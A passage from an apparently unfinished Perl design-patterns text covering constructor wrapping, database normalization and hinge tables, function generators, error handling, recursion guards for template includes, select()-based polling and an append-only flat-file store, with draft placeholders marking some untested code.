  *ExistingPackage::new = sub {
    my $self = $oldnew->(@_);
    $self->{new_variable} = compute_value();
    $self;
  };
};

This defines a new() routine in ExistingPackage that invokes the old new() routine using the reference we saved in $oldnew. This reference is passed all of the arguments given to the replacement new() routine. This assumes that the data structure underlying objects defined by ExistingPackage is a hash reference: $self->{new_variable} would need to be changed to something similar to $self->[$num] if it were an array. compute_value() is a place holder for whatever logic you really want to do. We insert this value forcefully, disregarding encapsulation. Finally, we return the modified $self.
The return operator breaks the tieing on perl 5.6.1, and perhaps later, so we just let the last value of the block fall through. Use the *x = sub { } version of sub: it waits until run time to return the code reference, allowing a closure to be taken. We're taking a closure on $oldnew in this example: we have to wait to bind to this variable until the specific instance of that variable we want has been created. This is being done inside of a do { } block so as not to pollute our lexical context with variables that don't need to be in our scope.

Example: B::Generate - [26]

See Also

It's useful to borrow the idea of relationships from Relational Database Management Systems (relational databases). In fact, many large enterprise applications are actually collections of specialized applications all built around one large data warehouse. Records in the database are represented in software by objects. These objects can be queried for things they relate to: other objects representing records. The design patterns shared by objects and relational database systems are actually somewhat interesting, and begin to touch on the idea of data cubes - flattening and restoring hyperdimensional data structures into two dimensions. The idea is prevalent, though not insightful, and should be illustrated here in depth. If a relational database and an object system each match up part to part - table for class - the object system will work through normal delegation and composition. The database will also "just work", though newbies will need to learn how to write large-ish queries that do lots of outer joins. Detecting NULL for key fields replaces ->can(), or is used when constructing queries that build systems of objects and ->can()/->isa() information is needed. This gets into datacube stuff, too.

See Also

Problem: Reporting on a database with only one table, or a self-referential data structure.

Solution: Use relational database capabilities to join anyway, joining the data to itself; write queries to normalize the data [29], or refactor the database. For data structures, use loops, temporary hashes, and recursion to make sense of the data [30].

"SelfJoiningData" in SelfJoiningData refers to data not spread across objects or tables of different types. Instead, everything is of the same type or in the same table, and this data forms a web of internal references. Sometimes powerful, usually applied incorrectly. In the database world, referred to as "non-normalized" or "flat". When relational data isn't normalized, you get something like:

select self1 as foo, self2 as bar
from self as self1, self as self2
where self1.name = self2.param

Note how the table self is being joined against the table self. This is where the name comes from. Or something like:

foreach my $i (keys %hash) {
  if(exists $hash{$i} and exists $hash{$hash{$i}}) {
    push @results, [$i, $hash{$i}, $hash{$hash{$i}}];
  }
}

Ugly, slow, crude, effective. People have been known to write code generators and SQL generators when faced with degenerate cases like these, automating ugliness production. I guess you could categorize this as an antipattern in the form of a pattern. The more fields you want back from the database, the more times you have to self-join the data. Pretend you have a database that stores form submits. forms has one record per post, but since an HTML form has any number of name=value pairs, several entries in parameters reference the entry in forms for any given post.
Given a formid, we want to extract a few named parameters: "email", "name", and "gender":

select p1.value as email, p2.value as name, p3.value as gender
from forms, parameters as p1, parameters as p2, parameters as p3
where forms.formid = ?
  and p1.formid = forms.formid and p1.name = 'email'
  and p2.formid = forms.formid and p2.name = 'name'
  and p3.formid = forms.formid and p3.name = 'gender'

Each additional field requires 4 additional lines in our query. If we were joining the additional tables in, it would take 2:

select emails.email as email, names.name as name, genders.gender as gender
from forms, emails, names, genders
where forms.formid = ?
  and forms.nameid = names.nameid
  and forms.emailid = emails.emailid
  and forms.genderid = genders.genderid

Obviously, lumping everything in one table would simplify further in this case, and in this case would be perfectly acceptable. When not all of the columns describe the primary key and only the primary key, the database design degenerates. "SelfJoiningData" in SelfJoiningData usually comes about as a means to cope with trying to report on such degenerate databases. Simply, different kinds of things should be placed in different tables. The structure (which table references which IDs in which other tables) shows the relationship between the different kinds of things. One to many relationships require two tables; many to many relationships require three.

Datastructures Solutions: XXX this place is a placeholder. You can fix it up yourself, or you can wait for me to do it. If you are here expecting a finished version of something, stick to the path and don't wander off.

<TakeFive> Juerd: I think I'm going to go with multiple tables after all. It will save me headaches in the future. And I can pull them (assuming the 'header' record is in %h) with: "select value from $h{datatype} where id = $h{id} order by sequence"

<Juerd> subqueries, subqueries, subqueries, joins. subqueries, subqueries, subqueries, joins.

<TakeFive> :)

<Juerd> Ideally, you don't use a query just to have enough information to do the next

<scrottie> Except for meta applications like database admins, usually you don't want a variable table name.

<Juerd> That is correct. Same goes for column names.

<Juerd> TakeFive: Think symbolic references

<scrottie> If all of your things are of essentially of the same type, put atleast the parts of them that describe the primary key in one table. You can always OutterJoin a lot of other tables, so you get kind of an ObjectOriented like thing going on - everything "is a" foo, but you have some MixIns going on as well. Not that MixIns are encouraged in OO, but it is kind of the same idea.

<TakeFive> scrottie: the problem is (going back to the oceanographic implementation) right now, with the dataset I have, all the actual data is floating point numbers --

<scrottie> i've always said we should dump our problems in the ocean =)

<TakeFive> salinities, depths, current speeds and such. but now i've been told i need to support character fields, latitude/longitude pairs, and timestamps, and ultimately, I'll need to be able to generate pictures of buoys as they float, or purely text output. If I use a single table, I'll always have to check what kind of data I have.

<scrottie> n:1 relationships break out into another table, so if you have a bunch of buoys for one given primary record (what is the primary record anyway?), then throw them all in another table.
If you have an arbitrary number of other things of types that you can't anticipate, you could promote everything to the same object type and allow recurisve references between objects ;) Perlers tend to write databases like that... like perlmonks's codebase... but it is best not to talk of such things

<Juerd> It's called Everything

<scrottie> If you have a lot of different things, you can set up an attribute-value pairs table. Think of HTML forms. Someone posts a form. That gets a record in a Posts table, lets say. it has a bunch of name value pairs. Each of those gets a record in the Attribute table, where each record references the Posts table entry.

<TakeFive> scrottie: ah, add a column like: "datatype" for each record.

<scrottie> Yeah. You lose the ability to cleanly join at that point - everything is nested subqueries with another self-join for each (lag) record you want from Attributes. ugly. So, that way is sometimes - seldom but sometimes - better.

<Juerd> subqueries, subqueries, subqueries, joins.

<scrottie> Well, the value in the attribute-value pair will always be the largest thing - if you're holding binary data, it will be a blob. Few databases index blobs.

<scrottie> You probably don't want SelfJoiningData, and you don't want to promote all records to the same type. That leaves creating a lot of tables, one for each type of thing, and doing a lot of joins and OutterJoins. It kind of sucks, but it is powerful, and a lot less ugly in the end than any alternative.

The relation between tables is based purely on references between fields. Never list table names in a database as a means of creating references. Juerd is right. Use lots of joins and subqueries to pull your data together from multiple different tables. As Juerd says, ideally, you should get your result in one query. Use only IDs in auxiliary tables. You can easily create more auxiliary tables and reference the primary table from them. Only queries that want this information will know about it and know to ask for it to be joined in. [31]

See Also

Individual people, each having a distinct set of traits, can be expressed cleanly with three tables. Any fewer would lead to "SelfJoiningData" in SelfJoiningData and an ever increasing number of columns holding primary, secondary, tertiary, and so on indefinitely, positional attributes, which can only be used in queries with great pain and modifications each time a new slot is added. Any more tables leads to the same problem, but with constant introduction of tables rather than attributes. The People table exists exactly as expected: a list of people, with columns for things that each and every person has. All attribute tables need to be generalized into one. Any further attribute-specific data may reference the Attribute table, but should not be included in the Attribute table itself: it holds only the columns which describe each and every attribute, and nothing else. Normalize the People table so that AttributeIDs don't exist in it. The rules of normalization state that any time we're attempting to hold an array of data in one record, we really want a third, independent table. This is exactly what we need to do. People contains PeopleID. Attribute contains AttributeID. PeopleToAttribute contains one PeopleID and one AttributeID per record. Each PeopleID may occur any number of times, and each AttributeID may occur any number of times, and these may occur in any combination. PeopleToAttribute is a hinge table; a sketch of querying through it follows.
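A hedged sketch of actually walking the hinge - listing every attribute a given person has. The table layout follows the discussion above, but the column names (People.Name, Attribute.Name) and the connection details are my own guesses:

use DBI;

my $dbh = DBI->connect('DBI:Pg:dbname=people', 'user', 'password',
                       { RaiseError => 1 });

# one row per (person, attribute) pair in the hinge table
my $attributes = $dbh->selectcol_arrayref(q{
    select Attribute.Name
    from   People, PeopleToAttribute, Attribute
    where  People.Name                   = ?
      and  People.PeopleID               = PeopleToAttribute.PeopleID
      and  PeopleToAttribute.AttributeID = Attribute.AttributeID
}, undef, 'Ralph');

print join(', ', @$attributes), "\n";

Giving a person a new attribute is one insert into PeopleToAttribute; no columns change anywhere.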
Hinge tables can and should contain data specific to the combination of the two IDs. Badly designed databases often require repeated application of this concept. A database that lists wholesale and retail prices, primary product category, and secondary category should be turned into a table listing Products, one listing Category, one listing PriceOption, and two hinge tables. ProductToCategory shows the membership of each product in each category by virtue of having a record making the connection:

select count(*) as isDongle
from Product, Category, ProductToCategory
where Product.ProductID = ProductToCategory.ProductID
  and ProductToCategory.CategoryID = Category.CategoryID
  and Category.Name = 'Dongle'

This query returns the number of dongles in the database. Replacing count(*) with a specific field list would return details of each dongle. PriceOption contains records "Wholesale" and "Retail", but cannot contain the actual prices. Attempting to do so would be no better than putting the prices directly into Product. ProductToPriceOption not only connects Product to the pricing options available for it as listed in PriceOption, but, for each pricing option, contains the actual price. Normalization dictates that each and every column in a table depend on (that is, be specific to) the key, the entire key, and nothing but the key. The price depends on more than ProductID in Product because it also depends on PriceOptionID in PriceOption. Likewise, it does not depend on just PriceOptionID, but also ProductID. ProductToPriceOption is keyed by both PriceOptionID and ProductID, so each record it contains is specific to both values. 3.95 may be the Retail price for "The Moon is a Harsh Mistress". Understanding object relationships is impossible without understanding the rules of data normalization. Failing to do so will result in obnoxiously complex object structures with no apparent solution for making sense of them. It is critical to deciding when to create objects, and where to place data in them.

See Also: "SelfJoiningData" in SelfJoiningData

One to many relationships become many to many as original design assumptions are relaxed. This lets us model more complex situations. Objects that contained one instance of a kind of another object may find themselves holding an array. Methods that operated on this object explicitly now need to be told which one to operate on. Defining an iterator and moving the interface to the iterator lets us keep our concept of one and only one object, but adds the concept of moving to the next object in the list. Places where the single object was implicitly manipulated need only be wrapped in a loop.

See also: "IteratorInterface" in IteratorInterface, "CompositePattern" in CompositePattern, "ObjectsAndRelationalDatabaseSystems" in ObjectsAndRelationalDatabaseSystems, "BiDirectionalRelationshipToUnidirectional" in BiDirectionalRelationshipToUnidirectional

See also: UML, SQL

Problem: Relationship between objects is confusing. Responsibility is ambiguous, or calls bounce back and forth.

Solution: Apply a whole object, "InnerClasses" in InnerClasses, a model-view-controller, or a "ConstraintSystem" in ConstraintSystem as necessary.

In its most basic form:

my $output = new Output;
my $backend = new Backend($output);
$output->set_backend($backend);

Or:

my $output = new Output($this);

Refactor: Should $output know about $backend or $this? Does it make sense for $backend to place a call into $output that requires a call back into $output?
WholeObject

Contention for data of exactly this sort is a strong hint at a refactoring: move the data that is of common interest into a whole object and pass it whole, negating the need for a callback. See "PassingState" in PassingState.

InnerClasses

Using "InnerClasses" in InnerClasses, the parent class need not have its API burdened with the special needs and interfaces of its child, and the scope of the circular reference can be greatly reduced. An object created inside of the parent object, attached to its lexical data, can be sent off in place of $this.

my $output = new Output;
my $backend = new Backend($output->get_backend_adapter());
$output->set_backend($backend->get_output_adapter());

Or...

my $output = new Output($this->get_output_adapter());

ModelViewController

As the saying goes, books don't shelve themselves, nor do shelves put the books on them, but there must exist a librarian. Consider mapping the problem as a model-view-controller. This is of more interest for dealing with too much complexity in the logic rather than too much complexity in the code.

ConstraintSystem

Sometimes an odd web of objects that participate in group-think is unavoidable, or even desirable. Bite the bullet and do it right. See "ConstraintSystem" in ConstraintSystem.

Resources

See Also

When adding and removing arguments, it can be difficult to remember the order you wanted them in. Using a hash, you can do away with arbitrary ordering.

See Also

Synopsis: The arguments to the first function are augmented and re-passed to the next function, possibly recursively.

When: Context is built up during evaluation, and this context ultimately turns into the result. Recursive code that deals with a variable set of variables. In place of code that uses $$var to directly access the symbol table.

See Also

Synopsis: Creating a custom complement of code cleans up crufty object access syntax.

When: Your code is bloating due to another cumbersome interface.

It has been said that no language will be well suited to every problem, so the best language is one that is well suited to creating languages for expressing solutions in general. Huh? Instead of attacking the problem head on, step back and formulate a plan involving intermediate steps to the goal. We've designed data structures using objects. We've engineered programs using objects as building blocks. When's the last time we designed a language to solve a problem? Any language lets you create functions, but Forth lets you create functions that create other functions (Forth calls functions "words"). We don't need to cook up a VM and a syntax to do this, though we could. Perl's VM and syntax will work. This is kind of like an Abstract Factory. Objects certainly give you a way to generalize a solution, but they don't give you a mechanism to express a solution. If the solution involves making lots of method calls, the algorithm can get swamped in OO syntax to the point where it is hidden. Removing the excess syntax is one way of refactoring code. Everyone benefits from the clarity, especially when you're trying to formulate a language as an intermediate step to solving a tough problem.

Let's take template processing as an example. Let's say you've got various sorts of templates: templates representing HTML fragments, templates representing email templates, database queries, and so on. You could create objects to represent each type of thing, and give each a stringify() method that requires a hash argument of values to template in. You would then write a huge amount of code, mostly method calls, loops, and string concatenations. The alternative - a little language of template-generating functions - is sketched below.
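The original example code for this section was lost; what follows is a guess at its shape, with names and the {placeholder} syntax of my own choosing - a function generator that turns a template string into a filler function, optionally installing it into the symbol table by name:

sub createtemplate {
    my ($template, $name) = @_;

    my $filler = sub {
        my %values = @_;
        (my $output = $template) =~ s/\{(\w+)\}/
            defined $values{$1} ? $values{$1} : die "no value for '$1'"
        /ge;
        return $output;
    };

    # naming the generated function is optional
    if($name) {
        no strict 'refs';
        *{$name} = $filler;
    }

    return $filler;
}

my $greet = createtemplate('Hello, {name}! Your order #{order} shipped.');
print $greet->(name => 'Ingy', order => 42), "\n";

createtemplate('Dear {name}, thanks for writing.', 'form_letter');
print form_letter(name => 'Marge'), "\n";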
XXX untested code. createtemplate() is a simple example. createquery() is more advanced. A simple example appeared in Chapter XXX 3 where we created accessors for ourselves. For any task that is suited to our mini-language, we've completely factored out several tedious syntactical things. We're now free to work in a very concise, expressive, short-hand language. Yet, we still have all of the power of Perl available - we haven't given up anything. The key elements are:

The returned code reference is lexically bound to the data you passed to it. The data passed to it could be any datatype, including objects, scalars, and most importantly, code references.

Logic is factored out of the main program into the inner part of the "create" routine, inside of the anonymous subroutine block.

Creating a symbol table entry (assigning the anonymous subroutine to a glob of the given name) is optional. This step can be skipped and done manually if you find yourself mostly creating functions to pass to other functions:

print createquery($readnumberbystatesql, { drawpiechart => createpiechart() }, 'drawpiechart');

It is traditional in languages like Lisp and Scheme to skip naming things unless actually necessary. Next time you're getting bogged down in syntax, ask yourself if a function generator could be written that would take care of the tedious busy work.

See Also

Die early, die often, get closer to the root of the problem. Don't let an error in one part of the program trigger problems much later in a distant, unrelated part of the program. Check argument types. Provide accessors to enforce policies, and handle state changes in objects there, so that objects are responsible for keeping themselves consistent. Have or die $!; appear after each statement whose failure you aren't prepared to handle otherwise. These clauses should absolutely litter your program. Should something fail unexpectedly, execution will stop at the exact point of failure, and the diagnostic will be fresh and useful. Things that a program assumes it can count on are called invariants. These are the basic assumptions that the program was written under. or die documents these in your code for all to see.

People resort to the printed documentation only when they can't figure out the interface for themselves. This applies equally to video games, digital time pieces, and software APIs. Diagnostics are more helpful than the manual, in this sense. This is part of "encapsulation" or "data hiding". Making part of your interface public is committing to support that design indefinitely. Don't do this lightly.

Sometimes you want your application to die with a useful diagnostic should an invariant be deviated from - for example, when you're first installing and configuring an application, or when you're debugging it. Other times, you want it to do its absolute best to keep on trucking, for instance when that program is running as a mission critical service. Making no attempt to trap errors achieves the first case. For the second case, wrap eval {} around calls. Where you apply this technique depends on how much recovery logic you're willing to write. The more recovery logic, the closer the protective eval {} can be to the possible failure points. Less recovery logic means that fewer eval {} statements are needed.

eval {
  run_query();
};
if($@) {
  $dbh = DBI->connect("DBI:Pg:dbname=blog;host=localhost;port=5432", 'scott', 'foo');
  run_query();
}

See Also

Code and data, time and space, lo... What follows is a rant on the nature of programs.
While not suitable for consumption in any format, it is a thought I need to develop further, as it affects every explanation in this text. Some declarations run as they are encountered; some affect future behavior. Run time program modification - self modifying code - is an example of affecting future behavior; so are lambda closures and object instantiations. Some languages are purely sequential: C. Some are purely declarative: Ocaml. For many people, data structures are seen as influencing future behavior only; likewise, code is always seen as executing immediately. Tied data, and object accessors used to fetch and stow data, give data structures the property of executing immediately. Changing the implementation on the fly by using the polymorphic nature of objects makes linear comprehension of code impossible. So do lambda closures.

See Also: "FunctionalProgramming" in FunctionalProgramming, "AbstractFactory" in AbstractFactory

Problem: Work is handled through recursion or delegation. Sometimes it is delegated back, or recursion never terminates due to a problem out of our control.

Solution: Use a re-entrance lock to detect and gracefully handle the situation. Set the lock on entrance and clear it on exit.

In yet another case, the one illustrated above, we're flatly denying recursion. If one node responds to events of type "A" with events of type "B", and another node responds to events of type "B" with events of type "A", and we did no reentry checking, Perl would explode. It would use up all of the memory the OS would allow it, grind away for a while, blow up like a big grinding balloon, and just pop. Nobody wants that. Putting rules in place for which events may be replied to with another event will prevent this situation as well. If you do opt for policy, you may elect to put some limits in place for testing purposes. These kinds of arbitrary limits can never be set correctly: what you consider an impossibly large value becomes unworkably small in a few years. For debugging, detecting what looks like a runaway condition can be a life saver.

Recursion and Locking on User Data

Recursing through user data. Sends chills up your spine, doesn't it? User data is notorious for conniving, manipulation, and being just plain old abusive, contrived rubbish. Why do users write HTML files that include a second HTML file that includes the first? To piss you off, that's why.

# expand includes in HTML templates
# eg, <!-- #include virtual="header.html" -->

my $numfound;

FOUNDSOME:
$numfound = 0;
$tmpl =~ s{<!--\s*\#include\s+(virtual|file)="(.*?)"\s*-->}{
  die "invalid include path: '$2'" if $2 =~ m{\.\.};
  open my $f, '<', "$inputdir/$2" or die "include not found: $inputdir/$2 $!";
  read $f, my $repl, -s $f;
  close $f;
  $numfound++;
  $repl;
}gie;
goto FOUNDSOME if $numfound;

This would run indefinitely (if permitted by the universe) if a user tried the A-includes-B, B-includes-A attack. Preventing reentry into some method wouldn't work. If we created a method, we would need to be able to reenter it to include more than one file deep. Of course, we could make it non-recursive, but it wouldn't do. Things that seem like they should work, don't. Limiting the stack depth is another option, but it is a violation of the "BusySpin" in BusySpin antipattern: no value can possibly be chosen that is large enough for extreme but valid cases, yet small enough to shut out denial of service attacks. Someone fetching a malicious construct over and over will easily take the server out.
Refusing to include the same page twice would also fail to do the job, and would throw cold water on most template arrangements that sites actually, really use. It is, however, simple to implement. Limiting the number of times that a single file may be included helps put the brakes on things, but violates the above pragmas concerning "BusySpin" in BusySpin as well:

my $numfound;
my %done;   # added this

FOUNDSOME:
$numfound = 0;
$tmpl =~ s{<!--\s*\#include\s+(virtual|file)="(.*?)"\s*-->}{
  die "invalid include path: '$2'" if $2 =~ m{\.\.};
  die "file '$2' included entirely too many times" if $done{$2}++ > 30;   # added this
  open my $f, '<', "$inputdir/$2" or die "include not found: $inputdir/$2 $!";
  read $f, my $repl, -s $f;
  close $f;
  $numfound++;
  $repl;
}gie;
goto FOUNDSOME if $numfound;

Another solution is to maintain a stack and continuously examine it for repeated sequences. Such attempts are prone to the occurrence of a "RaceCondition" in RaceCondition, and there is usually an upper limit on how large a stack segment will be compared against the rest of the stack. For example, if the code only checks for repeated patterns of two through 300 stack frame entries, someone need only create a circular inclusion attack that is 301 pages long. D'oh! Correctly solving this problem could be done by computing routes between pages and making a map of which pages include which others. This is far too complex for most people to stomach. If you happen to write a solution to this, please, by all means, post it here. It should be a straightforward adaptation of the example above. Yes, I'm just too lazy to do it myself right now. Elsewhere in this text there is an example of recursion in Perl that checks for recursive traps.

See Also

Stand-in for threads. Much more efficient in Unix. Named for the use of select(). A single inner loop waits for either a timeout, a signal, or a filehandle to become available for read or write. Coordination of reading and writing and responding to other events is handled in a single, centralized, and often massive central loop. Contrast with threads, where each thread has its own loop and blocks waiting for exactly one thing at any given time: an object lock, input, another thread to wake it, and so on. Many systems are built on top of select() and its style. AWT, the Java GUI toolkit, builds a facade on top of the event-oriented X11 platform on Unix-like hosts. The "SelectPollPattern" in SelectPollPattern is counter-intuitive for most people to use. It requires manual management of the CPU, and each task has to completely return to the inner loop and then be called fresh. [33]

my $inbitmask = '';
vec($inbitmask, fileno($sh), 1) = 1;
vec($inbitmask, fileno($si), 1) = 1;

# select(readtest, writetest, exceptiontest, max wait)
select($inbitmask, undef, undef, 0);

if(vec($inbitmask, fileno($sh), 1)) {
  # $sh is ready for read
}
if(vec($inbitmask, fileno($si), 1)) {
  # $si is ready for read
}

Done in a loop, several sources of input - perhaps the network, a GUI interface, pipes connected to other processes - could all be managed. The last argument to select() is typically 0 or undef, though it is sometimes other numbers. If it is undef, select() will wait indefinitely for input. If it is 0, select() will return immediately, input ready or not. Any other number is a number of seconds to wait, floating point numbers accepted. As soon as any monitored input or output handle becomes ready, select() will return. select() doesn't return the ready handles in the normal sense: it modifies the bit mask in place, turning off any bits that correspond to fileno() bit positions that aren't ready.
Each bit that we set must be tested to see if it is still on. If it is, that filehandle is ready for read or write. Filehandles that we want to monitor for read are passed as a bitmask in the first argument position of select(). The second argument of select() is the filehandles to monitor for write, and the third, for exceptions.

if(vec($inbitmask, fileno($si), 1)) {
  $si->process_input();
}

Filehandles may be blessed into classes [34], and then methods called to handle the event where input becomes available for read. This is easy to implement, simple, and sane - to implement, that is. Using it is another story.

package IO::Network::GnutellaConnection;

use base 'IO::Handle';

sub process_input {
  my $self = shift;
  $self->read(...);
}

Each handler must promptly return for other handles to be served. This is a big requirement. Unheeded, a user interface could repeatedly cause network traffic to time out, or one unresponsive process reading on a pipe could lock up the process writing on the pipe. These cases are more numerous and insidious than thread CPU starvation issues. To effectively cope with not having a return stack of its own, each line of processing associated with an IO handle must take pains to keep track of where it was in its code, what it is doing, and what it expects to do next. See "StatePattern" in StatePattern for an implementation of this and more discussion.

Non-Blocking I/O

Sometimes select() will tell you that an I/O channel is ready to read from, but attempting to read still blocks. Non-blocking I/O can be used as a safety net. When accepting connections on a TCP/IP socket, non-blocking I/O is a must:

use Socket;
use Fcntl qw(F_GETFL F_SETFL O_NONBLOCK);
use POSIX qw(:errno_h :fcntl_h);

my $port = 7070;   # whichever port we serve on

socket(my $server, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die "socket: $!";
setsockopt($server, SOL_SOCKET, SO_REUSEADDR, pack('l', 1)) or die "setsockopt: $!";
bind($server, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
listen($server, SOMAXCONN) or die "listen: $!";

# non blocking listens:
fcntl($server, F_SETFL, fcntl($server, F_GETFL, 0) | O_NONBLOCK) or die "fcntl: $!";

while(1) {
  my $paddr = accept(my $client, $server);
  next unless $paddr;   # nothing waiting - real code would select() on $server rather than spin
  (my $remoteport, my $remoteaddress) = sockaddr_in($paddr);
  my $remotehostname = gethostbyaddr($remoteaddress, AF_INET);
}

XXX - very dubious, could be written cleaner, probably doesn't work. accept() will try to accept a new connection, but it won't wait to do so. It returns immediately, and when $server is marked ready for read according to select(), we know a new connection has actually arrived. This integrates listening for new connections into the select-poll service loop. This code is based on code in "PerlDoc" in PerlDoc:perlipc

See Also

Problem: Slow updates and corrupt files.

Solution: Don't change data when you can append updated information instead, and never leave data in an indeterminate state.

package Xfor;

# method calls on Xfor objects are dispatched to the closures below by an
# AUTOLOAD like the one in hashclosure.pm, which also sets $this

sub new {
  my $pack = shift;

  my $filecache;  # holds all of the name->value pairs for each item in each file
  my $buffered;   # same format: data not yet written to file

  bless {

    # open a flatfile database. create it if needed.
    open => sub {
      my $fn = $_[0];
      unless(-f $fn) {
        open my $tmp, '>>', $fn or return 0;
        close $tmp;
      }
      $this->openorfail($fn);
    },

    # open a flatfile database. fail if we are unable to open an existing file.
    openorfail => sub {
      my $file = shift;   # which file the data is in
      open my $f, '<', $file or die $!;
      my $k; my $v;
      while(<$f>) {
        chomp;
        my %thingy = split /\||=/, 'key='.$_;
        while(($k, $v) = each %thingy) {
          $filecache->{$file}->{$thingy{'key'}}->{$k} = $v;
        }
      }
      close $f;
      return 1;
    },

    # fetch a value for a given key
    get => sub {
      my $file = shift;     # which file the data is in
      my $thingy = shift;   # which record in the file - row's primary key
      my $xyzzy = shift;    # which column in that record
      $this->openorfail($file) unless exists $filecache->{$file};
      return $filecache->{$file}->{$thingy}->{$xyzzy};
    },

    keys => sub {
      my $rec = $filecache;
      while(@_) {
        $rec = $rec->{$_[0]};
        shift;
      }
      if(wantarray) {
        keys %{$rec};
      } else {
        $rec;
      }
    },

    set => sub {
      my $file = shift;     # which file the data is in
      my $thingy = shift;   # which record in the file - row's primary key
      my $x = shift;        # which column in that record
      my $val = shift;      # new value to store there
      $filecache->{$file}->{$thingy}->{$x} = $val;
      $buffered->{$file}->{$thingy}->{$x} = $val;
      1;
    },

    # append buffered updates to the end of the file - journal style
    close => sub {
      my $file = shift;
      open my $f, '>>', $file or die $!;
      my $line;
      foreach my $thingy (keys %{$buffered->{$file}}) {
        $line = $thingy;
        foreach my $x (keys %{$buffered->{$file}->{$thingy}}) {
          $line .= '|' . $x . '=' . $buffered->{$file}->{$thingy}->{$x};
        }
        print $f $line, "\n";
      }
      $buffered->{$file} = {};
      close $f;
    },

    # rewrite the file from scratch with only the latest data
    recreate => sub {
      my $file = shift;
      open my $f, '>', "$file.$$" or die $!;
      my $line;
      foreach my $thingy (keys %{$filecache->{$file}}) {
        $line = $thingy;
        foreach my $x (keys %{$filecache->{$file}->{$thingy}}) {
          $line .= '|' . $x . '=' . $filecache->{$file}->{$thingy}->{$x};
        }
        print $f $line, "\n";
      }
      close $f;
      rename "$file.$$", $file or die "$! on rename $file.$$ to $file";
    },

  }, $pack;
}

To use, do something like:

use Xfor;

my $hash = new Xfor;
$hash->open('carparts.nvp');

# read: which muffler does the xj-11 use?
$hash->get('carparts.nvp', 'xj-11', 'muffler');

# write:
$hash->set('carparts.nvp', 'xj-11', 'muffler', 'c3p0');

# then later:
$hash->close('carparts.nvp');
# or...
$hash->recreate('carparts.nvp');

Xfor.pm reads files from beginning to end, and goes with the last value discovered. This lets us write by kind-of journaling: we can just tack updated information onto the end. We can also regenerate the file with only the latest data, upon request. Since we read in all data, we're none too speedy. Reading is as slow as Storable or the like, but writing is much faster. Data is written to the end of the file when the ->close() method is called. There are no fixed record lengths. We never go into the middle of a file and try to insert data. We don't move and regenerate the file unless explicitly asked to, and we only do that to keep it from getting too large. A tied-hash interface could be provided for persistent journaled storage without the clumsy method interface - see the sketch below. If a single value is needed, the entire file need not be read into memory - this case could be optimized. We use the vertical bar as a field delimiter - this is bound to cause problems unless we escape it in strings, in which case the escape character must also be escaped when it occurs normally. Taking a length-prefixed approach is usually better than trying to escape things: include an explicit length and then use read() to read exactly that much data. "ExportingPattern" in ExportingPattern talks about creating a single default instance that can be used without explicitly naming an object, only using the correct methods. This example should also take a few arguments to the constructor and pass them to each method so that a default file, or default file and default record, can be specified.
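The tied-hash interface mentioned above might look something like this - a sketch only, tying a hash to one record (one file, one primary key) of the store, with just FETCH and STORE implemented and error handling omitted:

package Xfor::TiedRecord;

sub TIEHASH {
    my ($class, $xfor, $file, $record) = @_;
    $xfor->open($file) or die "cannot open $file";
    bless { xfor => $xfor, file => $file, record => $record }, $class;
}

sub FETCH {
    my ($self, $key) = @_;
    $self->{xfor}->get($self->{file}, $self->{record}, $key);
}

sub STORE {
    my ($self, $key, $value) = @_;
    $self->{xfor}->set($self->{file}, $self->{record}, $key, $value);
}

package main;

tie my %xj11, 'Xfor::TiedRecord', Xfor->new, 'carparts.nvp', 'xj-11';

print $xj11{muffler}, "\n";    # reads through to the flat file
$xj11{muffler} = 'c3p0';       # buffered, journaled on close()

The method interface disappears: code written against a plain hash now works against the flat file without knowing it.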
Xfor.pm isn't useful as a module as it stands, but it illustrates the trade off between read time and write time that simple journaling approaches offer.

See Also: perldoc perltie, "AnonymousSubroutineObjects" in AnonymousSubroutineObjects

I'd rather write programs that write programs than write programs. We're told to do something in only one place, in accordance with keeping our secret bits hidden away and not duplicated all over the place like a scandal on the tabloid front page. A Perl module would be expected to export these values and routines when used. A Java package would be expected to give an object reference that can be prodded with method calls and examination of package global and object instance fields. A Bourne shell script would spit out another shell script, which it would then execute. That's what I want to talk about.

A lot of language rhetoric tells us not to worry about the size of our applications. We should load all of the modules we need rather than ever thinking of copying and modifying a program or module. Like anything that says "always" or "never", this is dangerous. Rather than writing a clean implementation that loads a bazillion modules, we'll sheepishly dumb down the specs, and set our expectations of the application low. We'll hardcode things for fear of creating modules. In short, we'll deal with the module explosion problem by developing a neurotic aversion to creating more of the bastards. Each new candidate for modulehood seems to pale in comparison to the last 3 or 4 hundred modules that were endorsed.

The heart of the problem is with diverging applications, the kind we make when we copy one program to reuse it for another client, for instance. Conventional wisdom says to copy the entire thing and add on to it - in essence, without removing anything. There are two cross sections we're trying to cut the same application into at once: the cross section of the functionality we need for this client, and the cross section of how functionality is structured within the application. Organizing the entire application by which logic may or may not be needed for future projects assumes knowledge we don't have, and it completely neglects organizing the objects by their relationship with each other - our primary reason for using objects. Organizing the entire application by its functional structure introduces an undue amount of dependence between building blocks, in an environment where the very purpose of the application can go two or more ways at once, as different clients have the application customized. In fact, it is very rare that it is even attempted to have diverging versions track each other. The BSDs, selectively adapting code from each others' projects, are a good example. Even so, each BSD has gone in a different direction, introducing a very real element of manual labor in adapting code, despite the historic common origins.

Another example is GNU autoconf. If you've ever installed Unix software from source code (Perl, perhaps?), you've probably downloaded a tarball, typed tar -xzvf foo.tar.gz, chdired into the directory, typed ./configure, then make. configure is a shell script, generated by GNU autoconf. Every time anyone needs to test for a new feature which may or may not be present in POSIX-like operating environments as part of the build process, the test for that feature is added to GNU autoconf. Okey, not every time, but this is the secret to GNU autoconf's success.
Every application running the same configure script, which tested for everything, would be unworkable. It would take hours to run on a fast computer, and do all sorts of work not needed. Configuring certain tests off would help, but you're still forcing poor bash* to read a several thousand line (several hundred thousand line long?) script when only a few lines may be needed. With open source software, programmers may be tolerant of lots of unrelated code or hooks kicking around. In the real world, clients don't want to know about each other. They're just happier that way*.

Writing an application to write applications lets you put everything where it belongs, score high on tests, structure your code according to natural, logical criteria, and not bog clients down with a beast that is the sum of the size of all of its copies. This idea is nothing new. The concept of returning code is a cornerstone of the lambda programming style. We could, and otherwise should, use ordinary modules, but we're trying to exclude the code from ever going out the door. The idea is similar to generating a string of code and using eval on it, but once again, we're trying to keep the code from ever disgracing their hard drive. Using modules like SelfLoader breaks your module up into individual functions (methods) that are loaded on demand from strings stored past the __END__ of your program. XXX quick hack to look at a module and spit out select sections either as ready or as regular Perl code. - round this out, proof it, give it a few examples. See Also

Do you want to send them an email with a generated password in it to validate their email address?

